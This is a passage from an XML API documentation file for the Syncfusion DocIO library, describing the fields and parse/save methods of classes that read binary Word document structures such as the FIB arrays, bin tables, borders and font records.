        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbRgbuse">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcUsp">
            <summary>
            offset in main stream of undocumented undo / versioning data
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbUsp">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcUskf">
            <summary>
            offset in table stream of undocumented undo / versioning data
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbUskf">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPlcupcRgbuse">
            <summary>
            offset in table stream of undocumented undo / versioning data
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPlcupcRgbuse">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPlcupcUsp">
            <summary>
            offset in table stream of undocumented undo / versioning data
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPlcupcUsp">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcSttbGlsyStyle">
            <summary>
            offset in table stream of string table of style names for glossary entries
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbSttbGlsyStyle">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPlgosl">
            <summary>
            offset in table stream of undocumented grammar options PL
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPlgosl">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPlcocx">
            <summary>
            offset in table stream of undocumented ocx data
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPlcocx">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPlcfbteLvc">
            <summary>
            offset in table stream of character property bin table.PLC. FCs in PLC are file offsets. Describes text of main document and all subdocuments.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPlcfbteLvc">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.dwLowDateTime">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.dwHighDateTime">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPlcflvc">
            <summary>
            offset in table stream of LVC PLCF
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPlcflvc">
            <summary>
            size of LVC PLCF, ==0 for non-complex files
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPlcasumy">
            <summary>
            offset in table stream of autosummary ASUMY PLCF.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPlcasumy">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPlcfgram">
            <summary>
            offset in table stream of PLCF (of SPLS structures) which records grammar check state
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPlcfgram">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcSttbListNames">
            <summary>
            offset in table stream of list names string table
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbSttbListNames">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcSttbfUssr">
            <summary>
            offset in table stream of undocumented undo / versioning data
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbSttbfUssr">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.Parse(System.Byte[],System.Int32)">
            <summary>
            Parses the specified structure.
            </summary>
            <param name="arrBytes">The arr bytes.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.Save(System.Byte[],System.Int32)">
            <summary>
            Saves the data structure.
            </summary>
            <param name="arrData">The destination array.</param>
            <param name="iOffset">The offset.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.Length">
            <summary>
            Gets the size of the structure.
            </summary>
            <value>The length.</value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfLongs">
            <summary>
            Summary description for ArrayOfShorts.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfLongs.cbMac">
            <summary>
            file offset of last byte written to file + 1.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfLongs.lProductCreated">
            <summary>
            contains the build date of the creator. 10695 indicates the creator program was compiled on Jan 6, 1995
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfLongs.lProductRevised">
            <summary>
            contains the build date of the File's last modifier
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfLongs.ccpText">
            <summary>
            length of main document text stream
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfLongs.ccpFtn">
            <summary>
            length of footnote subdocument text stream
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfLongs.ccpHdr">
            <summary>
            length of header subdocument text stream
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfLongs.ccpMcr">
            <summary>
            length of macro subdocument text stream, which should now always be 0.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfLongs.ccpAtn">
            <summary>
            length of annotation subdocument text stream
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfLongs.ccpEdn">
            <summary>
            length of endnote subdocument text stream
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfLongs.ccpTxbx">
            <summary>
            length of textbox subdocument text stream
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfLongs.ccpHdrTxbx">
            <summary>
            length of header textbox subdocument text stream.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfLongs.pnFbpChpFirst">
            <summary>
            when there was insufficient memory for Word to expand the plcfbte at save time, the plcfbte is written to the file in a linked list of 512-byte pieces starting with this pn
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfLongs.pnChpFirst">
            <summary>
            the page number of the lowest numbered page in the document that records CHPX FKP information
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfLongs.cpnBteChp">
            <summary>
            count of CHPX FKPs recorded in file. In non-complex files if the number of entries in the plcfbteChpx is less than this, the plcfbteChpx is incomplete.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfLongs.pnFbpPapFirst">
            <summary>
            when there was insufficient memory for Word to expand the plcfbte at save time, the plcfbte is written to the file in a linked list of 512-byte pieces starting with this pn
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfLongs.pnPapFirst">
            <summary>
            the page number of the lowest numbered page in the document that records PAPX FKP information
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfLongs.cpnBtePap">
            <summary>
            count of PAPX FKPs recorded in file. In non-complex files if the number of entries in the plcfbtePapx is less than this, the plcfbtePapx is incomplete.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfLongs.pnFbpLvcFirst">
            <summary>
            when there was insufficient memory for Word to expand the plcfbte at save time, the plcfbte is written to the file in a linked list of 512-byte pieces starting with this pn
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfLongs.pnLvcFirst">
            <summary>
            the page number of the lowest numbered page in the document that records LVC FKP information
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfLongs.cpnBteLvc">
            <summary>
            count of LVC FKPs recorded in file. In non-complex files if the number of entries in the plcfbtePapx is less than this, the plcfbtePapx is incomplete.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfLongs.fcIslandFirst">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfLongs.fcIslandLim">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfLongs.Length">
            <summary>
            Length of the array.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfLongs.BytesCount">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfShorts">
            <summary>
            Summary description for ArrayOfShorts.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfShorts.m_arrShorts">
            <summary>
            Array of shorts.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfShorts.Resize(System.Int32)">
            <summary>
            Resizes array.
            </summary>
            <param name="iNewSize">New size of the array.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfShorts.SetBuffer(System.Byte[])">
            <summary>
            
            </summary>
            <param name="arrBuffer"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfShorts.Save(System.Byte[],System.Int32)">
            <summary>
            Copies data from array of shorts into array of bytes.
            </summary>
            <param name="arrData">Array of bytes to copy data into.</param>
            <param name="iOffset">Starting offset in the destination array.</param>
            <returns>Size in bytes of the copied data.</returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfShorts.Length">
            <summary>
            Length of the array.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfShorts.BytesCount">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfShorts.KnownCount">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfShorts.Buffer">
            <summary>
            Gets / sets internal buffer.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfShorts.wMagicCreated">
            <summary>
            unique number Identifying the File's creator 0x6A62 is the creator ID for Word and is reserved. Other creators should choose a different value.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfShorts.wMagicRevised">
            <summary>
            identifies the File's last modifier
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfShorts.wMagicCreatedPrivate">
            <summary>
            private data
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfShorts.wMagicRevisedPrivate">
            <summary>
            private data
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfShorts.pnFbpChpFirst_W6">
            <summary>
            not used
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfShorts.pnChpFirst_W6">
            <summary>
            not used
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfShorts.cpnBteChp_W6">
            <summary>
            not used
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfShorts.pnFbpPapFirst_W6">
            <summary>
            not used
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfShorts.pnPapFirst_W6">
            <summary>
            not used
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfShorts.cpnBtePap_W6">
            <summary>
            not used
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfShorts.pnFbpLvcFirst_W6">
            <summary>
            not used
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfShorts.pnLvcFirst_W6">
            <summary>
            not used
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfShorts.cpnBteLvc_W6">
            <summary>
            not used
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfShorts.lidFE">
            <summary>
            Language id if document was written by Far East version of Word (i.e. FIB.fFarEast is on)
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BinTableEntry">
            <summary>
            Summary description for BinTableEntry.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BinTableEntry.RECORD_SIZE">
            <summary>
            Record size in bytes.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BinTableEntry.m_iValue">
            <summary>
            Binary table entry value.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BinTableEntry.Parse(System.Byte[],System.Int32)">
            <summary>
            Parses the specified data array.
            </summary>
            <param name="arrData">The arr data.</param>
            <param name="iOffset">The i offset.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BinTableEntry.Save(System.Byte[],System.Int32)">
            <summary>
            Saves the structure to data array.
            </summary>
            <param name="arrData">The arr data.</param>
            <param name="iOffset">The i offset.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BinTableEntry.Value">
            <summary>
            Binary table entry value.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BookmarkFirstStructure">
            <summary>
            Summary description for BookmarkFirstStructure.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BookmarkFirstStructure.m_beginCP">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BookmarkFirstStructure.m_endIndex">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BookmarkFirstStructure.m_props">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BookmarkFirstStructure.SavePos">
            <summary>
            Saves bookmark positions.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BookmarkFirstStructure.SaveProps">
            <summary>
            Saves bookmark properties.
            </summary>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BookmarkFirstStructure.BeginPos">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BookmarkFirstStructure.Props">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BookmarkFirstStructure.EndIndex">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BorderStructure">
            <summary>
            Summary description for Border Structure.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BorderStructure.m_dptLineWidth">
            <summary>
            width of a single line in 1/8 pt, max of 32 pt.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BorderStructure.m_brcType">
            <summary>
            border type code:
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BorderStructure.m_color">
            <summary>
            color code
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BorderStructure.m_props">
            <summary>
            :5 1F00 width of space to maintain between border and text within border. 
                    Must be 0 when BRC is a substructure of TC. Stored in points. 
            :1 2000 when 1, border is drawn with shadow. Must be 0 when BRC is a substructure of the TC 
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BorderStructure.#ctor(System.Byte[],System.Int32)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BorderStructure"/> class.
            </summary>
            <param name="arr">The arr.</param>
            <param name="iOffset">The i offset.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BorderStructure.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BorderStructure"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BorderStructure.Clone">
            <summary>
            Clones the BorderStructure instance.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BorderStructure.Parse(System.Byte[],System.Int32)">
            <summary>
            Parse byte array to BorderCode structure
            </summary>
            <param name="arr"></param>
            <param name="iOffset"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BorderStructure.Save(System.Byte[],System.Int32)">
            <summary>
            Saves the specified arr.
            </summary>
            <param name="arr">The arr.</param>
            <param name="iOffset">The i offset.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BorderStructure.LineWidth">
            <summary>
            Width of a Line 
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BorderStructure.BorderType">
            <summary>
            Border type code
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BorderStructure.Space">
            <summary>
            Width of space to maintain between border and text within border
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BorderStructure.Shadow">
            <summary>
            when true, border is drawn with shadow
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BorderStructure.LineColor">
            <summary>
            Gets or sets the color of the line.
            </summary>
            <value>The color of the line.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BorderStructure.IsClear">
            <summary>
            Gets a value indicating whether this instance is clear.
            </summary>
            <value>if this instance is clear, set to <c>true</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BorderStructure.Props">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BorderStructure.Length">
            <summary>
            Gets the size of the structure.
            </summary>
            <value>The length.</value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BreakDescriptorStructure">
            <summary>
            BreaK Descriptor (BKD).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BreakDescriptorStructure.ipgd">
            <summary>
            except in textbox BKD, index to PGD in plfpgd that describes the page this break is on.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BreakDescriptorStructure.itxbxs">
            <summary>
            in textbox BKD,
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BreakDescriptorStructure.dcpDepend">
            <summary>
            number of cp's considered for this break; note that the CP's described by cpDepend in this break reside in the next BKD
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BreakDescriptorStructure.iCol">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BreakDescriptorStructure.Options">
            <summary>
            Option flags.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BreakDescriptorStructure.Parse(System.Byte[],System.Int32)">
            <summary>
            Parse the data strucure
            </summary>
            <param name="arrData">Bytes with data</param>
            <param name="iOffset">Offset</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BreakDescriptorStructure.Save(System.Byte[],System.Int32)">
            <summary>
            Saves the specified arr.
            </summary>
            <param name="arr">The arr.</param>
            <param name="iOffset">The offset.</param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BreakDescriptorStructure.Length">
            <summary>
            Gets the size of the structure.
            </summary>
            <value>The length.</value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BXStructure">
            <summary>
            Summary description for BXStructure.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BXStructure.DEF_RECORD_SIZE">
            <summary>
            Size of the record.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BXStructure.m_btOffset">
            <summary>
            Word offset of the PAPX (PAragraph Property eXception ) recorded
            for the paragraph corresponding to the BX.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BXStructure.m_height">
            <summary>
            PHE structure which stores the current paragraph height for
            the paragraph corresponding to the BX.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BXStructure.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BXStructure.Parse(System.Byte[],System.Int32)">
            <summary>
            Parse the data strucure
            </summary>
            <param name="arrData">Bytes with data</param>
            <param name="iOffset">Offset</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BXStructure.Save(System.Byte[],System.Int32)">
            <summary>
            Saves the data structure.
            </summary>
            <param name="arrData">The destination array.</param>
            <param name="iOffset">The offset.</param>
            <returns>Length</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BXStructure.Save(System.IO.BinaryWriter)">
            <summary>
            Saves the specified writer.
            </summary>
            <param name="writer">The writer.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BXStructure.Offset">
            <summary>
            Word offset of the PAPX (PAragraph Property eXception ) recorded
            for the paragraph corresponding to the BX.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BXStructure.Height">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BXStructure.Length">
            <summary>
            Gets the size of the structure.
            </summary>
            <value>The length.</value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FFNBaseStructure">
            <summary>
            Base structure for FontFamilyNameRecord.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FFNBaseStructure.DEF_RECORD_LENGTH">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FFNBaseStructure.m_btTotalLength">
             <summary>
             Total length of FFN - 1.
             </summary>
            [ FieldOffset( 0 ) ]
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FFNBaseStructure.m_btOptions">
             <summary>
             Option flags.
             <list>
              2bits - pitch request 
              1bit  - when 1, font is a TrueType font 
              1bit  - reserved 
              3bits - font family id 
              1bit  - reserved 
             </list>
             </summary>
            [ FieldOffset( 1 ) ]
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FFNBaseStructure.m_wWeight">
             <summary>
             Base weight of font.
             </summary>
            [ FieldOffset( 2 ) ]
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FFNBaseStructure.m_btCharacterSetId">
             <summary>
             Character set identifier.
             </summary>
            [ FieldOffset( 4 ) ]
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FFNBaseStructure.m_btAlternateFontIndex">
             <summary>
             Index into ffn.szFfn to the name of the alternate font.
             </summary>
            [ FieldOffset( 5 ) ]
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FFNBaseStructure.m_PANOSE">
            <summary>
            "Magic" data.
            <sample>
            { 0x2, 0x2, 0x6, 0x3, 0x5, 0x4, 0x5, 0x2, 0x3, 0x4 }
            </sample>
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FFNBaseStructure.m_FONTSIGNATURE">
            <summary>
            "Magic" data.
            <sample>
            m_FONTSIGNATURE[ 0 ] = 0x87;
            m_FONTSIGNATURE[ 1 ] = 0x7a;
            ...
            m_FONTSIGNATURE[ 3 ] = 0x20;
            ...
            m_FONTSIGNATURE[ 7 ] = 0x80;
            m_FONTSIGNATURE[ 8 ] = 0x8;
            ...
            m_FONTSIGNATURE[ 16 ] = 0xff;
            m_FONTSIGNATURE[ 17 ] = 0x1;
            </sample>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FFNBaseStructure.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FFNBaseStructure.Parse(System.Byte[],System.Int32)">
            <summary>
            Parse the data strucure
            </summary>
            <param name="arrData">Bytes with data</param>
            <param name="iOffset">Offset</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FFNBaseStructure.Save(System.Byte[],System.Int32)">
            <summary>
            Saves the data structure.
            </summary>
            <param name="arrData">The destination array.</param>
            <param name="iOffset">The offset.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FFNBaseStructure.TotalLengthM1">
            <summary>
            Total length of FFN - 1.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FFNBaseStructure.Options">
            <summary>
            Option flags.
            <list>
             2bits - pitch request 
             1bit  - when 1, font is a TrueType font 
             1bit  - reserved 
             3bits - font family id 
             1bit  - reserved 
            </list>
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FFNBaseStructure.Weight">
            <summary>
            Base weight of font.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FFNBaseStructure.CharacterSetId">
            <summary>
            Character set identifier.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FFNBaseStructure.AlternateFontIndex">
            <summary>
            Index into ffn.szFfn to the name of the alternate font.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FFNBaseStructure.Length">
            <summary>
            Length of record.
            </summary>
            <value>The length.</value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FIBHeader">
            <summary>
